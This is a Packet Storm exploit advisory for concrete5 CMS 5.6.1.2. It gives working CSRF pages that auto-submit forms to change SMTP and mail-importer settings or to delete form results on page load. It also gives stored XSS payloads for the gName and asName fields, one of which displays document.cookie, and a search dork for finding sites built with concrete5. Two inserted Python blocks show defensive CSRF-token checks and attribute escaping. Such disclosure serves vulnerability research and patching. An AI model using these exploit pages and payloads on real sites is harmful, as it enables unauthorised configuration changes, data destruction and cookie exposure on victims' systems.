Concrete5 CMS 5.6.1.2 Cross Site Request Forgery / Cross Site Scripting

2013-06-10T00:00:00
ID PACKETSTORM:121965
Type packetstorm
Reporter expl0i13r
Modified 2013-06-10T00:00:00

Description

=============================================================  
__ __ _ ___ _ __ ____   
\ \ / / | | / _ \ (_) /_ | |___ \   
___ \ V / _ __ | | | | | | _ | | __) | _ __  
/ _ \ > < | '_ \ | | | | | | | | | | |__ < | '__|  
| __/ / . \ | |_) | | | | |_| | | | | | ___) | | |   
\___| /_/ \_\ | .__/ |_| \___/ |_| |_| |____/ |_|   
| |   
|_| blackpentesters.blogspot.com  
=============================================================  
  
###########################################################################################  
# Exploit Title: [ concrete5 CMS v5.6.1.2 Multiple CSRF and Stored XSS Vulnerabilities] #  
# Date: [2013-6-9] #  
# Exploit Author: [expl0i13r] #  
# Vendor Homepage: [http://www.concrete5.org/] #  
# Software Link: [http://www.concrete5.org/download_file/-/view/51635/8497/] #  
# Version: [5.6.1.2] #  
# Google Dork: [Built with concrete5 - an open source CMS] #  
# Tested on: [Windows] #  
# Contact: expl0i13r@gmail.com #  
###########################################################################################  
  
Summary:  
========  
1. CSRF (Modify SMTP Settings)  
2. CSRF (Modify Mail Importers Settings)  
3. CSRF (Delete Form Results)  
4. Stored XSS  
  
  
1. CSRF (Modify SMTP Settings):  
================================  
  
concrete5 v5.6.1.2 suffers from multiple CSRF vulnerabilities, one of which allows an attacker  
to modify the "SMTP Settings" and "Send Mail Method" available at the URL below:  
  
Affected URL:  
--------------  
http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/mail/method/  
  
  
----------------------------------------------------------------------------------------  
Note: The code below submits the prepared form values and updates the settings as soon as the victim loads this page  
----------------------------------------------------------------------------------------  
  
<html>  
<head>  
<script type="text/javascript" language="javascript">  
function submitform()  
{  
document.getElementById('myForm').submit();  
}  
</script>  
</head>  
<body>  
<form name="myForm" method="post" action="http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/mail/method/save_settings/" class="form-horizontal" id="mail-settings-form" original-class="form-horizontal">  
  
<input type="radio" name="MAIL_SEND_METHOD" id="MAIL_SEND_METHOD2" value="SMTP" class="ccm-input-radio" checked>  
<input id="MAIL_SEND_METHOD_SMTP_SERVER" type="text" name="MAIL_SEND_METHOD_SMTP_SERVER" value="127.0.0.1" class="ccm-input-text">   
<input id="MAIL_SEND_METHOD_SMTP_USERNAME" type="text" name="MAIL_SEND_METHOD_SMTP_USERNAME" value="expl0i13r" class="ccm-input-text">   
<input id="MAIL_SEND_METHOD_SMTP_PASSWORD" type="text" name="MAIL_SEND_METHOD_SMTP_PASSWORD" value="expl0i13r" class="ccm-input-text">   
<select name="MAIL_SEND_METHOD_SMTP_ENCRYPTION" id="MAIL_SEND_METHOD_SMTP_ENCRYPTION" ccm-passed-value="SSL" class="ccm-input-select">  
<option value="">None</option>  
<option value="SSL" selected="selected">SSL</option>  
<option value="TLS">TLS</option></select>  
<input id="MAIL_SEND_METHOD_SMTP_PORT" type="text" name="MAIL_SEND_METHOD_SMTP_PORT" value="" class="ccm-input-text">   
  
</form>  
<script type="text/javascript" language="javascript">  
document.myForm.submit()  
</script>  
</body>  
</html>  
  
  
2. CSRF (Modify Mail Importer Settings)  
=========================================  
  
The code below exploits a CSRF vulnerability that allows an attacker to edit and update the "Importer Settings" details.  
  
Affected URL :  
---------------  
  
http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/mail/importers/edit_importer/1/  
  
----------------------------------------------------------------------------------------  
Note: The code below submits the prepared form values and updates the importer settings as soon as the victim loads this page  
----------------------------------------------------------------------------------------  
  
<html>  
<head>  
<script type="text/javascript" language="javascript">  
  
function submitform()  
{  
document.getElementById('myForm').submit();  
  
}  
  
</script>  
</head>  
  
<body>  
  
<form name = "myForm" method="post" id="mail-importer-form" class="form-horizontal" action="http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/mail/importers/save_importer/" original-class="form-horizontal">  
  
<input type="hidden" name="miID" id="miID" value="1">   
<input id="miEmail" type="text" name="miEmail" value="exploiter">  
<input id="miServer" type="text" name="miServer" value="127.0.0.1" class="ccm-input-text">   
<input id="miUsername" type="text" name="miUsername" value="" class="ccm-input-text">   
<input id="miPassword" type="text" name="miPassword" value="" class="ccm-input-text"> <input id="miPort" type="text" name="miPort" value="8080" class="ccm-input-text">   
  
<select name="miEncryption" id="miEncryption" ccm-passed-value="" class="ccm-input-select">  
<option value="" selected="selected">None</option>  
</select>  
  
<select name="miIsEnabled" id="miIsEnabled" ccm-passed-value="1" class="ccm-input-select">  
<option value="1" selected="selected">Yes</option>  
</select>   
  
<select name="miConnectionMethod" id="miConnectionMethod" ccm-passed-value="POP" class="ccm-input-select">  
<option value="POP" selected="selected">POP</option>  
</select>   
  
</form>  
  
<script type="text/javascript" language="javascript">  
document.myForm.submit()  
</script>  
  
</body>  
</html>  
  
  
3. CSRF (Delete Form Results)  
===============================  
  
Each submission listed on the "REPORTS" > "Form Results" page has a static "qsID" assigned to it, which an attacker can use to delete submissions.  
  
Ex.  
---  
After a default install of this CMS, a "Contact Us" form is available at the URL: http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/blog/hello-world/about/contact-us/  
  
For the above contact form, the qsID in my case is "1370626098"; it can be found at the URL:  
  
--------------------------------------------------------------------------------------  
http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/  
--------------------------------------------------------------------------------------  
  
<a href="/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/?qsID=1370626098&action=deleteFormAnswers" class="btn small error delete-form-answers ccm-button-v2-left">Delete Submissions</a>  
------------------------------------------------------------------------------------------------------  
  
To exploit this CSRF, the attacker must know the "qsID" value, which requires at least limited access to the CMS.  
  
Steps:  
------  
  
1. The attacker logs in to the CMS  
2. Navigates to "http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/"  
3. Reads the static "qsID" value from the page source  
4. Uses that "qsID" in the CSRF exploit below  
  
Code:  
-------  
  
<html>  
<head>  
<script>  
// "delete" is a reserved word in JavaScript, so the function needs another name  
function deleteSubmissions()  
{  
  
// Delete submissions of the "Contact Us" page  
  
window.open("http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/?qsID=1370626098&action=deleteFormAnswers")  
  
}  
</script>  
</head>  
<body onload="deleteSubmissions()">  
</body>  
</html>  
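All three CSRF items share the same root cause: the save_settings and save_importer handlers accept any POST that carries the victim's session cookie, and the form-results delete is triggered by a plain GET link. The following is an added example (not code from the advisory or from concrete5) of the server-side checks that close them: every state-changing action must be a POST, must carry a token bound to the session with an HMAC, and, as defence in depth, must not arrive from a foreign Origin/Referer. The request model, the token field name `csrf_token` and the secret are constructed for the example; the URLs are the ones from the advisory.

```python
import hashlib
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import parse_qs, urlsplit

# Constructed secret for this example; a real deployment loads it from configuration.
SERVER_SECRET = secrets.token_bytes(32)
# Origin of the concrete5 install used throughout the advisory.
SITE_ORIGIN = "http://127.0.0.1"
# Hypothetical name of the hidden form field that carries the token.
TOKEN_FIELD = "csrf_token"


@dataclass
class Request:
    """Minimal model of an incoming HTTP request (constructed for this example)."""
    method: str
    url: str
    form: dict = field(default_factory=dict)      # POST body fields
    headers: dict = field(default_factory=dict)
    session_id: str = ""                          # from the cookie the browser attaches automatically


def issue_csrf_token(session_id: str) -> str:
    """Derive a token bound to the session with an HMAC. The dashboard page that renders
    a form embeds this value; a page on another site cannot read or forge it."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def is_state_changing(req: Request) -> bool:
    """The three endpoints from the advisory that modify or delete data."""
    parts = urlsplit(req.url)
    if parts.path.endswith(("/save_settings/", "/save_importer/")):
        return True
    return "deleteFormAnswers" in parse_qs(parts.query).get("action", [])


def same_origin(req: Request) -> bool:
    """Defence in depth: a browser sends Origin (or Referer) on cross-site form posts.
    If neither header is present the decision is left to the token check."""
    src = req.headers.get("Origin") or req.headers.get("Referer")
    if not src:
        return True
    p = urlsplit(src)
    return f"{p.scheme}://{p.netloc}" == SITE_ORIGIN


def authorize(req: Request) -> tuple:
    """Return (allowed, reason) for a request; read-only requests pass through."""
    if not is_state_changing(req):
        return True, "read-only"
    if req.method.upper() != "POST":
        # Blocks the link-triggered delete of item 3: a GET must never change state.
        return False, "state change via GET rejected"
    if not same_origin(req):
        return False, "cross-origin request rejected"
    expected = issue_csrf_token(req.session_id).encode()
    submitted = str(req.form.get(TOKEN_FIELD, "")).encode()
    if not hmac.compare_digest(expected, submitted):
        # Blocks the auto-submitting forms of items 1 and 2, which cannot know the token.
        return False, "missing or invalid CSRF token"
    return True, "ok"


def demo() -> dict:
    """Replay the advisory's requests plus a legitimate one (all constructed)."""
    sid = "victim-session-cookie"
    base = "http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard"
    smtp_url = base + "/system/mail/method/save_settings/"
    delete_url = base + "/reports/forms/?qsID=1370626098&action=deleteFormAnswers"
    requests = {
        # Item 1: hidden form on a foreign page; the browser sends that page's Origin.
        "forged_smtp": Request("POST", smtp_url, {"MAIL_SEND_METHOD": "SMTP"},
                               {"Origin": "http://evil.example"}, sid),
        # Same post with Origin/Referer stripped: only the token check stands in the way.
        "forged_smtp_no_origin": Request("POST", smtp_url, {"MAIL_SEND_METHOD": "SMTP"}, {}, sid),
        # Item 3: the delete URL opened from another page.
        "forged_delete": Request("GET", delete_url, {}, {"Referer": "http://evil.example/"}, sid),
        # A real dashboard submission carrying the token the server embedded in the form.
        "legit": Request("POST", smtp_url,
                         {"MAIL_SEND_METHOD": "SMTP", TOKEN_FIELD: issue_csrf_token(sid)},
                         {"Origin": SITE_ORIGIN}, sid),
    }
    return {name: authorize(r) for name, r in requests.items()}


if __name__ == "__main__":
    for name, (allowed, reason) in demo().items():
        print(f"{name:24} {'ALLOW' if allowed else 'DENY':5} {reason}")
```

The token check is the primary control; the Origin/Referer comparison only adds a second, independent reason to refuse the forged posts, and falls back to the token when a client sends neither header. The GET rule is what removes item 3 and the XSS-1 payload's window.open trick at the same time, since a navigation can only ever produce a GET.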
  
  
4. Multiple Stored XSS  
=======================  
  
concrete5 CMS also suffers from stored XSS vulnerabilities, which can be used to "Delete Form Results"  
every time the page is loaded.  
  
Stored XSS-1  
============  
  
URL:  
----  
http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/users/add_group/  
  
Vulnerable Parameter:  
----------------------  
<input type="text" name="gName" class="span6" value="" id="acpro_inp2">  
  
  
XSS-CSRF Payload:  
------------------  
  
"><script>window.open("http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/?qsID=1370626098&action=deleteFormAnswers");alert('Form Result Data Deleted - eXpl0i13r')</script>  
  
  
Stored XSS-2:  
=============  
  
URL:  
-----  
http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/attributes/sets/  
  
Vulnerable Parameter:  
----------------------  
<input id="asName" type="text" name="asName" value="" class="ccm-input-text">  
  
Payload:  
---------  
  
"><script>alert('hacked by eXpl0i13r\n'+document.cookie)</script>  
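Both stored XSS items have the same shape: a saved name (gName, asName) is written back into the value attribute of an input without escaping, so a leading double quote ends the attribute and the remainder is parsed as new elements. The block below is an added example (not code from the advisory or from concrete5) that renders the gName input from the advisory both ways and runs a browser-like parser over the result, so the difference is visible as a list of elements rather than a string. The payload is a shortened, constructed version of the one above.

```python
import html
from html.parser import HTMLParser

# Constructed value for the gName / asName fields, shortened from the advisory's payload.
STORED_NAME = '"><script>alert(document.cookie)</script>'

# The input element from the advisory's "Vulnerable Parameter" section.
INPUT_TEMPLATE = '<input type="text" name="gName" class="span6" value="{value}" id="acpro_inp2">'


def render_unsafe(name: str) -> str:
    """The vulnerable behaviour: the stored value is interpolated verbatim, so a leading
    double quote closes the attribute and the rest becomes new markup."""
    return INPUT_TEMPLATE.format(value=name)


def render_safe(name: str) -> str:
    """Escape for the attribute context: quote=True turns " into &quot; (and < into &lt;),
    so the value stays inside the attribute no matter what it contains."""
    return INPUT_TEMPLATE.format(value=html.escape(name, quote=True))


class _Walker(HTMLParser):
    """Records the elements the parser sees and the value attribute of the input."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.input_value = None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            # HTMLParser hands back attribute values with entities already decoded.
            self.input_value = dict(attrs).get("value")


def parse(markup: str) -> tuple:
    """Return (list of element names, value attribute of the input) for a fragment."""
    w = _Walker()
    w.feed(markup)
    w.close()
    return w.tags, w.input_value


if __name__ == "__main__":
    for label, render in (("unsafe", render_unsafe), ("safe", render_safe)):
        tags, value = parse(render(STORED_NAME))
        print(f"{label:6} elements={tags} input value={value!r}")
```

The unsafe rendering yields two elements, an input with an empty value and a script element; the safe rendering yields one input whose decoded value is the original string, which is exactly what an administrator typed and nothing more. Escaping belongs at the point of output for the context being written (here an attribute), regardless of where the value was stored.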
  
  
##################################  
# eXpl0i13r #  
# ------------------------------ #  
#|blackpentesters.blogspot.com |#  
#|infotech-knowledge.blogspot.in|#  
# ------------------------------ #  
##################################  
  